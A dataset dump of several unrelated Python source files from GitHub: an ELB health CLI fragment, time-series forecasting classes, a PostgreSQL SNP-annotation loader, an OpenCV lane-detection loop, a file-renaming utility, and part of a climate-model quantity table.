},\n {\n 'type': 'list',\n 'name': 'tg',\n 'message': 'Which TG/backend are you having issue with?',\n 'choices': api.retrieve_target_groups, #this is always invoked despite if the question is asked, causing problem when CLB is selected\n 'when': lambda answers: answers['elb_type'] != 'classic'\n }\n ]\n \n answers = prompt(questions)\n targets_health,tg_target_count = getTargetHealth(answers)\n healthy_host_count,unhealthy_host_count = parseTgHealth(answers,targets_health) #consider to fetch from CW metrics, easier for AZ specific data\n \n print(\"\\n\")\n\n renderer = output_renderer()\n if answers['elb_type'] == 'classic':\n renderer.output_v1(targets_health,healthy_host_count,unhealthy_host_count)\n elif answers['elb_type'] != 'classic':\n renderer.output_v2(answers,targets_health,healthy_host_count,unhealthy_host_count,tg_target_count)\n\nif __name__ == \"__main__\":\n main()","repo_name":"aws/elb-doctor","sub_path":"elb_doctor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"43271410822","text":"from abc import abstractmethod, ABC\nfrom typing import List, Optional, Dict, Union\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom general_analytics_framwork.base_processes import AbstractComponent\nfrom general_analytics_framwork.datasets import TimeseriesBacktestDataset\n\n\nclass TimeSeriesModel(AbstractComponent):\n\n def run(self, data):\n for backtest_dataset in data:\n for window in backtest_dataset:\n self.fit_predict(window)\n return data\n\n def fit_predict(self, data: TimeseriesBacktestDataset):\n self.fit(data.get_data(\"y\", \"train\"), data.get_data(\"regressors\", \"train\"))\n prediction = self.predict(data.window.test_window_length)\n data.add_prediction(self, prediction)\n return data\n\n @abstractmethod\n def get_reference(self) -> str:\n\n \"\"\"\n Get a reference string for the model.\n\n Returns:\n str: The reference string.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def fit(\n self,\n y_train: List[float],\n regressors_train: Optional[Dict[str, List[Union[float, int]]]]\n ) -> None:\n \"\"\"\n Fit the model to the training data.\n\n Parameters:\n y_train (List[float]): The target values for training.\n regressors_train: Optional[Dict[str, List[Union[float, int]]]]:\n The regressor data\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def predict(self, horizon: int) -> List[float]:\n \"\"\"\n Make predictions for the given horizon.\n\n Parameters:\n horizon (int): The number of time steps to predict.\n\n Returns:\n List[float]: The predicted values.\n \"\"\"\n raise NotImplementedError\n\n\nclass RandomWalk(TimeSeriesModel):\n \"\"\"\n RandomWalk class representing the Random Walk model.\n\n Attributes:\n last_observation_seen (Optional[float]): The last observation seen.\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize the Random Walk model.\n \"\"\"\n self.last_observation_seen: Optional[float] = None\n self._accepts_regressors: bool = False\n\n def fit(\n self,\n y_train: List[float],\n regressors_train: Optional[Dict[str, List[Union[float, int]]]] = None\n ) -> None:\n \"\"\"\n Fit the Random Walk model.\n\n Parameters:\n y_train (List[float]): The target values for training.\n regressors_train (Optional[Dict[str, List[Union[float, int]]]]):\n The regressor data.\n \"\"\"\n self.last_observation_seen = y_train[-1]\n\n def predict(self, horizon: int) -> List[float]:\n \"\"\"\n Make predictions using the Random Walk model.\n\n Parameters:\n horizon (int): The number of time steps to predict.\n\n Returns:\n List[float]: The predicted values.\n \"\"\"\n return [self.last_observation_seen for _ in range(horizon)]\n\n def get_reference(self) -> str:\n \"\"\"\n Get a reference string for the Random Walk model.\n\n Returns:\n str: The reference string.\n \"\"\"\n return \"RandomWalk\"\n\n\nclass ARIMA(TimeSeriesModel):\n \"\"\"\n ARIMA class representing the AutoRegressive Integrated Moving Average model.\n\n Parameters:\n auto_regressive (int, optional): The number of auto-regressive terms.\n integrated (int, optional): The order of differencing.\n moving_average (int, optional): The number of moving average terms.\n trend_type (str, optional): Type of trend component.\n\n Attributes:\n order (tuple): Order of ARIMA model.\n trend_type (str): Type of trend component.\n model (SARIMAX): The SARIMAX model instance.\n\n \"\"\"\n\n def __init__(\n self,\n auto_regressive: int = 1,\n integrated: int = 0,\n moving_average: int = 0,\n trend_type: Optional[str] = None):\n\n \"\"\"\n Initialize the ARIMA model.\n\n Parameters:\n auto_regressive (int, optional): The number of auto-regressive terms.\n integrated (int, optional): The order of differencing.\n moving_average (int, optional): The number of moving average terms.\n trend_type (str, optional): Type of trend component.\n \"\"\"\n self.order = (auto_regressive, integrated, moving_average)\n self.trend_type = trend_type\n self.model: Optional[SARIMAX] = None\n self._accepts_regressors: bool = False\n\n def fit(\n self,\n y_train: List[float],\n regressors_train: Optional[Dict[str, List[Union[float, int]]]] = None\n ) -> None:\n \"\"\"\n Fit the ARIMA model.\n\n Parameters:\n y_train (List[float]): The target values.\n regressors_train (Dict[str, List[Union[float, int]]], optional):\n The regressor data.\n\n Returns:\n None\n \"\"\"\n self.model = SARIMAX(\n endog=y_train,\n order=self.order,\n trend=self.trend_type,\n enforce_invertibility=False,\n enforce_stationarity=False\n ).fit(disp=0)\n\n def predict(self, horizon: int) -> List[float]:\n \"\"\"\n Make predictions using the ARIMA model.\n\n Parameters:\n horizon (int): The number of time steps to predict.\n\n Returns:\n List[float]: The predicted values.\n \"\"\"\n return self.model.forecast(horizon)\n\n def get_reference(self) -> str:\n \"\"\"\n Get a reference string for the ARIMA model.\n\n Returns:\n str: The reference string.\n \"\"\"\n reference = f\"ARIMA (AR: {self.order[0]}, \" \\\n f\"I: {self.order[1]}, \" \\\n f\"MA: {self.order[2]})\"\n return reference\n\n","repo_name":"tjwilks/general-analytics-framework","sub_path":"general_analytics_framwork/modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34383276846","text":"#! /usr/bin/env python\n\nimport os\nimport sys\n\nimport argparse\nimport psycopg2\nimport select\nimport re\nimport time \n\n\n# check if illegal chars are present in string\n# if yes, exit\n# legal strings = a-z, A-Z, dot, underscore, 0-9\n# param: string to sanitize\n# param: string descriptor, eg tablename\ndef sanitize( s, d='' ):\n mo = re.search( r'([^\\a-zA-Z0-9\\._])', s )\n if mo:\n illegal_char = mo.group(1)\n sys.stderr.write( \"illegal character %s in %s %s\\n\" % ( illegal_char, d, s ) )\n sys.exit()\n\n\n# get db credentials from tab-separated file\n# there should only be one set of credentials\n# param: string, filepath\n# return: tuple of username, password, db_port, host\ndef get_creds( creds_file ):\n fh = open( creds_file )\n for line in fh:\n line = line.rstrip( '\\n' )\n line = line.lstrip()\n if not line: continue\n if line.startswith( '#' ): continue\n\n username, password, port, host = line.split( '\\t' )\n return ( username, password, port, host )\n\n\n# connect to postgres db\n# param: string, db name\n# param: string, path to tab-separated db credentials file\n# return: dn connection object, db cursor object\ndef postgres_connect( db, creds_file ):\n user, pwd, port, host = get_creds( creds_file )\n dsn = 'host=%s port=%s dbname=%s user=%s password=%s' % ( host, port, db, user, pwd )\n conn = psycopg2.connect( dsn )\n curs = conn.cursor()\n\n return( conn, curs )\n\n\n\n# process each line of annotation file\n# param: string representing line of file\n# param: argparse object\n# return: tuple of variant name, annotation value\ndef process_line( line, args ):\n line = line.strip()\n if not line: return snp2value\n \n if args.header_starter:\n if line.startswith( args.header_starter ): return None\n\n fields = line.split( args.delim )\n\n snp_name = fields[args.snp_name_column]\n\n if args.db_column_datatype.lower() == 'boolean':\n if not args.present_snp_value:\n sys.stderr.write( \"specify --present_snp_value\\n\" )\n sys.exit()\n else:\n value = args.present_snp_value\n else:\n # if value is missing, substitute default_value\n if len( fields ) < ( args.value_column + 1 ):\n value = args.default_value\n else:\n value = fields[args.value_column]\n \n return [ snp_name, value ]\n\n\n# for summary table, get range of values in annotation\n# param: argparse object\n# return: string representing range\ndef get_range( args ):\n if args.db_column_datatype == 'boolean':\n f_range = 'True, False'\n elif args.db_column_datatype == 'varchar':\n f_range = 'NA'\n elif args.db_column_datatype == 'float' or args.db_column_datatype == 'integer':\n\n sql = 'SELECT MAX( %s ), MIN( %s ) FROM %s' % ( args.db_column_name,\n args.db_column_name,\n args.table )\n curs.execute( sql )\n col_max, col_min = curs.fetchone()\n f_range = '%s, $s' % ( col_min, col_max )\n else:\n msg = \"Can't determine feature range for datatype %s\\n\" % ( args.db_column_datatype )\n raise ValueError( msg )\n\n\n return f_range\n\n\ndef parse_args():\n parser = argparse.ArgumentParser( description='''Add to or update snp annotations in a db table.''' )\n\n parser.add_argument( '--create_column', action='store_true', \n help='drop, create column; DELETES EXISTING DATA IN COLUMN' )\n parser.add_argument( '--create_index', action='store_true', help='add index on annotation column' )\n parser.add_argument( '--creds_file', \n help='''file with db credentials; tab-separated user, password, port, and host\n default: /home/cconnoll/chuckworking/annotation_db/gecco_db_creds''',\n default='/home/cconnoll/chuckworking/annotation_db/gecco_db_creds' )\n parser.add_argument( '--default_value', default=None, help='default: None; used for missing values' )\n parser.add_argument( '--delim', default='\\t', help='field delimiter, defaults to tab' )\n parser.add_argument( '--db', help=\"name of db; defaults to 'functional_annotation'\",\n default='functional_annotation' )\n parser.add_argument( '--db_column_name', required=True, help='name of feature' )\n parser.add_argument( '--db_column_datatype', required=True,\n help='valid SQL datatype, needed if creating column here' )\n parser.add_argument( '--header_starter', help='start of header line if present' )\n parser.add_argument( '-p', '--present_snp_value', help='value to insert if snp is present in list' ) \n parser.add_argument( '--snp_files', nargs='*',\n help='file with snp names and optionally value' )\n parser.add_argument( '--snp_name_column', type=int, default=1,\n help='column in snp_file with snp_name; defaults to 1')\n parser.add_argument( '--summary_table', \n help='table with summary stats; default:variant_annotation_feature_summary',\n default='variant_annotation_feature_summary' )\n parser.add_argument( '--table', help=\"name of db table; defaults to 'variant_annotation'\",\n default='variant_annotation' )\n parser.add_argument( '--update_column', action='store_true', \n help=\"update column, requires that column exists already\" )\n parser.add_argument( '--value_column', type=int, default=2,\n help='column in snp_file with value; defaults to 2' )\n \n args = parser.parse_args()\n\n for arg in [ args.db, args.db_column_name, args.db_column_datatype, args.table ]:\n sanitize( arg )\n\n\n args.snp_name_column -= 1\n args.value_column -= 1\n return args\n\n\n\n################################################################################\n################################################################################\n##\n## main\n##\n################################################################################\n################################################################################\n\n# in some fashion, obtain list of snps to be added and associated feature value\n# put these snps into a dict where snp_name is key, feature value is value\n# loop over the summary files, appending the appropriate\n# feature value for each snp\n# need to append a header field as well\n# a two column input (file or STDIN) is a key-value pair\n# a one column input requires a feature value to be \n# appended for the snps in the list, and a value for\n# absent snps\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n conn, curs = postgres_connect( args.db, args.creds_file )\n\n if args.create_column:\n drop_column_sql = '''ALTER TABLE {0} DROP COLUMN IF EXISTS {1}'''.format( args.table, args.db_column_name )\n curs.execute( drop_column_sql )\n conn.commit()\n\n add_column_sql = '''ALTER TABLE {0} ADD COLUMN {1} {2}'''.format( args.table, \n args.db_column_name, \n args.db_column_datatype )\n curs.execute( add_column_sql )\n conn.commit()\n elif args.update_column:\n sql = \"\"\"SELECT column_name\n FROM information_schema.columns \n WHERE table_name='{0}' and column_name='{1}'\"\"\".format( args.table, args.db_column_name )\n curs.execute( sql )\n row = curs.fetchone()\n if not row:\n sys.stderr.write( \"column %s does not exist in table %s\\n\" % ( args.db_column_name, \n args.table ) )\n sys.exit()\n else:\n sys.stderr.write( \"please specify '--update_column' or '--create_column'\\n\" )\n sys.exit()\n\n update_sql = 'UPDATE {0} SET {1} = %s WHERE variant_name = %s'.format( args.table, \n args.db_column_name )\n\n # read snps from stdin\n while sys.stdin in select.select([sys.stdin,],[],[],0.0)[0]:\n line = sys.stdin.readline()\n if line.startswith( '#' ): continue\n if line:\n snp_name, value = process_line( line, args )\n curs.execute( update_sql, [ value, snp_name] )\n \n # read snps from files\n values = []\n for filename in args.snp_files:\n\n # might be nice to fork and sbatch here, committing at the end, \n # would need to set up intermachine communication. db? ipc over tcp/ip?\n # work ok as is, if resources become strained consider implementation\n\n sys.stderr.write( 'processing %s\\n' % ( os.path.basename( filename ) ) )\n sys.stderr.flush()\n fh = open( filename )\n for line in fh:\n if args.header_starter:\n if line.startswith( args.header_starter ): continue\n snp_name, value = process_line( line, args )\n curs.execute( update_sql, [ value, snp_name ] )\n values.append( value )\n fh.close()\n sys.stderr.write( \"committing\\n\" )\n conn.commit()\n\n if args.create_index:\n sys.stderr.write( \"creating index\\n\" )\n index_sql = 'create index on {0} ( {1} )'.format( args.table, args.db_column_name ) \n curs.execute( index_sql )\n conn.commit()\n\n # add to summary\n summary_sql = '''INSERT INTO {0} (feature_name, feature_datatype, feature_count, feature_range )\n VALUES ( %s, %s, %s, %s )\n ON CONFLICT DO UPDATE \n SET feature_name = %s, feature_datatype = %s, \n feature_count = %s, feature_range = %s'''.format( args.summary_table )\n\n if 'char' in args.db_column_datatype:\n args.db_column_datatype = 'string'\n\n f_count = len( values )\n f_range = get_range( args )\n\n curs.execute( summary_sql, [ args.db_column_name, args.db_column_datatype, f_count, f_range ] )\n conn.commit()\n \n","repo_name":"charlesconnolly/tools","sub_path":"add_annotation.py","file_name":"add_annotation.py","file_ext":"py","file_size_in_byte":10213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37095036321","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nimport math\nfrom matplotlib import pyplot as plt\nimport time\n\ncap = cv2.VideoCapture(\"video1.mp4\")\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nlower = 0\nupper = 1\n\nwhite_1_hsv = np.array([0, 0, 78], dtype=np.uint8)\nwhite1 = np.array([200, 200, 200], dtype=np.uint8)\nwhite_2_hsv = np.array([0, 0, 100], dtype=np.uint8)\nwhite2 = np.array([255, 255, 255], dtype=np.uint8)\n\nwhile(True):\n# # Capture frame-by-frame\n \n ret, frame = cap.read()\n mask_white = cv2.inRange(frame, white1, white2)\n\n \n if ret == False:\n print(\"Codigo de retorno FALSO - problema para capturar o frame\")\n\n blur = cv2.GaussianBlur(mask_white, (5,5),0)\n\n edges = cv2.Canny(blur,50,150)\n \n lines = cv2.HoughLines(edges,1,np.pi/180, 150)\n\n lista_m = []\n lista_h = []\n\n linhas_d_m = []\n linhas_d_x1 = []\n linhas_d_x2 = []\n linhas_d_y1 = []\n linhas_d_y2 = []\n linhas_d_h = []\n\n linhas_e_m = []\n linhas_e_x1 = []\n linhas_e_x2 = []\n linhas_e_y1 = []\n linhas_e_y2 = []\n linhas_e_h = []\n\n xis = []\n yis = []\n\n for x in range(0, len(lines)): \n for rho, theta in lines[x]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n m = (y2 - y1)/(x2 - x1)\n \n h = y1 - m*x1\n\n lista_h.append(h)\n lista_m.append(m)\n\n #direita\n if m>0.3 and m<2:\n linhas_d_m.append(m)\n linhas_d_x1.append(x1)\n linhas_d_x2.append(x2)\n linhas_d_y1.append(y1)\n linhas_d_y2.append(y2)\n linhas_d_h.append(h)\n\n\n #esquerda\n elif m<-0.2 and m>-2:\n linhas_e_m.append(m)\n linhas_e_x1.append(x1)\n linhas_e_x2.append(x2)\n linhas_e_y1.append(y1)\n linhas_e_y2.append(y2)\n linhas_e_h.append(h)\n \n else:\n lista_m.remove(m) \n lista_h.remove(h)\n\n\n \n \n if len(lista_m) > 1 and lista_m[0] != lista_m[1]:\n x_i = (lista_h[1] - lista_h[0])/(lista_m[0] - lista_m[1])\n y_i = lista_m[0] * x_i + lista_h[0]\n x_i = int(x_i)\n y_i = int(y_i)\n xis.append(x_i)\n yis.append(y_i)\n\n \n x1 = 0\n x2 = 0\n x3 = 0\n x4 = 0\n y1 = 0\n y2 = 0\n y3 = 0\n y4 = 0\n \n #linha direita\n if len(linhas_d_m)>1:\n x1 = int(np.mean(linhas_d_x1))\n x2 = int(np.mean(linhas_d_x2))\n y1 = int(np.mean(linhas_d_y1))\n y2 = int(np.mean(linhas_d_y2))\n cv2.line(frame,(x1,y1), (x2,y2), (50,0,255),2) \n \n #linha esquerda\n if len(linhas_e_m)>1:\n x3 = int(np.mean(linhas_e_x1))\n x4 = int(np.mean(linhas_e_x2))\n y3 = int(np.mean(linhas_e_y1))\n y4 = int(np.mean(linhas_e_y2))\n cv2.line(frame,(x3,y3), (x4,y4), (50,0,255),2) \n\n #ponto de intersecção\n if x1!=0 and x2!=0 and x3!=0 and x4!=0:\n px = int(((x1*y2 - y1*x2)*(x3-x4) - (x1-x2)*(x3*y4 - y3*x4))/((x1-x2)*(y3-y4) - (y1-y2)*(x3-x4)))\n py = int(((x1*y2 - y1*x2)*(y3-y4) - (y1-y2)*(x3*y4-x4*y3))/((x1-x2)*(y3-y4)-(y1-y2)*(x3-x4)))\n cv2.circle(frame, (px, py), 1, (0,255,0), 5)\n\n cv2.imshow(\"Vídeo\", frame)\n\n # ver posicao 0, colocar em variavel, acessar variavel\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n\n\n","repo_name":"Bilbia/robot_at3","sub_path":"Bilbia_Rascunho.py","file_name":"Bilbia_Rascunho.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27335834682","text":"import os\nimport sys\n\n\ndef rename(directory):\n for filename in os.listdir(directory):\n newpath = directory + '/' + filename.lower()\n os.rename(directory + '/' + filename, newpath)\n if os.path.isdir(newpath):\n rename(newpath)\n\n\nif __name__ == \"__main__\":\n rename(sys.argv[1])\n","repo_name":"pawel-wlk/python-course","sub_path":"l2/tolower.py","file_name":"tolower.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38657399177","text":"from sympl import (DataArray, add_direction_names,\n ensure_no_shared_keys)\nimport numpy as np\nimport copy\nfrom datetime import datetime\nfrom scipy.interpolate import CubicSpline\n\n\ndef init_mid_level_pressures(array_dims, quantity_description, initial_state):\n # We assume the vertical level is the last dimension\n vert_levels = array_dims[-1]\n\n p_surf = quantity_description['surface_air_pressure']['default_value']\n spacing = np.linspace(0.998, 0.001, vert_levels)\n single_column = p_surf*spacing\n single_column = single_column[np.newaxis, np.newaxis, :]\n\n return single_column*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_pressures(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n p_surf = quantity_description['surface_air_pressure']['default_value']\n spacing = np.linspace(0.998, 0.001, vert_levels-1)\n midlevel = p_surf*spacing\n\n interface = np.zeros(vert_levels)\n interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n interface[0] = p_surf\n interface[-1] = 0.0005*p_surf\n\n return interface*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_sigma(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels-1)\n midlevel = spacing\n\n interface = np.zeros(vert_levels)\n interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n interface[0] = 1.\n interface[-1] = 0.0005\n\n return interface*np.ones(array_dims, order='F')\n\n\ndef init_mid_level_sigma(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels)\n midlevel = spacing\n\n return midlevel*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_tau_longwave(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels-1)\n midlevel = spacing\n\n interface = np.zeros(vert_levels)\n interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n interface[0] = 1.\n interface[-1] = 0.0005\n tau_longwave = 1.*(1 - interface)\n\n return tau_longwave*np.ones(array_dims, order='F')\n\n\ndef init_ozone(array_dims, quantity_description, initial_state):\n\n import pkg_resources\n\n init_array = np.ones(array_dims, order='F')\n current_levels = np.linspace(0.998, 0.001, 30)[::-1]\n\n target_levels = np.linspace(0.998, 0.001, array_dims[-1])[::-1]\n\n file_name = 'ozone_profile.npy'\n file_path = 'climt._data'\n\n resource_path = pkg_resources.resource_filename(file_path, file_name)\n\n profile = np.load(resource_path)\n\n target_profile = CubicSpline(current_levels, profile[::-1])(target_levels)[::-1]\n\n if array_dims[-1] == 30:\n target_profile = profile\n\n # Ensure ozone concentration at top of model is not excessive\n # This is more in line with observations.\n target_profile[-1] /= 10\n\n init_array[:] = target_profile[np.newaxis, np.newaxis, :]\n\n return init_array\n\n\nclimt_quantity_descriptions = {\n 'latitude': {\n 'dims': ['x', 'y'],\n 'units': 'degrees_north',\n 'default_value': 0\n },\n 'longitude': {\n 'dims': ['x', 'y'],\n 'units': 'degrees_east',\n 'default_value': 0\n },\n 'air_pressure': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'Pa',\n 'init_func': init_mid_level_pressures\n },\n 'air_pressure_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'Pa',\n 'init_func': init_interface_level_pressures\n },\n 'sigma_levels': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'init_func': init_mid_level_sigma\n },\n 'sigma_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'dimensionless',\n 'init_func': init_interface_level_sigma\n },\n 'longwave_optical_depth_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'dimensionless',\n 'init_func': init_interface_level_tau_longwave\n },\n 'surface_air_pressure': {\n 'dims': ['x', 'y'],\n 'units': 'Pa',\n 'default_value': 1.0132e5\n },\n 'air_temperature': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'degK',\n 'default_value': 290.\n },\n 'air_temperature_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'degK',\n 'default_value': 290.\n },\n 'surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'sea_surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'soil_surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'northward_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'eastward_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'divergence_of_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 's^-1',\n 'default_value': 0.\n },\n 'atmosphere_relative_vorticity': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 's^-1',\n 'default_value': 0.\n },\n 'surface_geopotential': {\n 'dims': ['x', 'y'],\n 'units': 'm^2 s^-2',\n 'default_value': 0.\n },\n 'surface_longwave_emissivity': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 1.\n },\n 'specific_humidity': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'g/g',\n 'default_value': 0.\n },\n 'surface_specific_humidity': {\n 'dims': ['x', 'y'],\n 'units': 'g/g',\n 'default_value': 0.\n },\n 'mole_fraction_of_ozone_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'init_func': init_ozone\n },\n 'mole_fraction_of_carbon_dioxide_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 330e-6\n },\n 'mole_fraction_of_methane_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_nitrous_oxide_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_oxygen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.21\n },\n 'mole_fraction_of_nitrogen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.78\n },\n 'mole_fraction_of_hydrogen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 500e-9\n },\n 'mole_fraction_of_cfc11_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_cfc12_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_cfc22_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_carbon_tetrachloride_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'cloud_area_fraction_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'shortwave_optical_thickness_due_to_aerosol': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'longwave_optical_thickness_due_to_aerosol': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'mass_content_of_cloud_ice_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'mass_content_of_cloud_liquid_water_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'cloud_ice_particle_size': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'micrometer',\n 'default_value': 20.\n },\n 'cloud_water_droplet_radius': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'micrometer',\n 'default_value': 10.\n },\n 'longwave_optical_thickness_due_to_cloud': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'shortwave_optical_thickness_due_to_cloud': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'longwave_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'longwave_heating_rate_assuming_clear_sky': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'upwelling_longwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upwelling_longwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_longwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_longwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'shortwave_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'shortwave_heating_rate_assuming_clear_sky': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'upwelling_shortwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upwelling_shortwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_shortwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_shortwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'surface_upward_sensible_heat_flux': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'surface_upward_latent_heat_flux': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upward_heat_flux_at_ground_level_in_soil': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'heat_flux_into_sea_water_due_to_sea_ice': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'convective_precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'stratiform_precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'convective_precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'stratiform_precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'atmosphere_convective_mass_flux': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2 s^-1',\n 'default_value': 0.\n },\n 'atmosphere_convective_available_potential_energy': {\n 'dims': ['x', 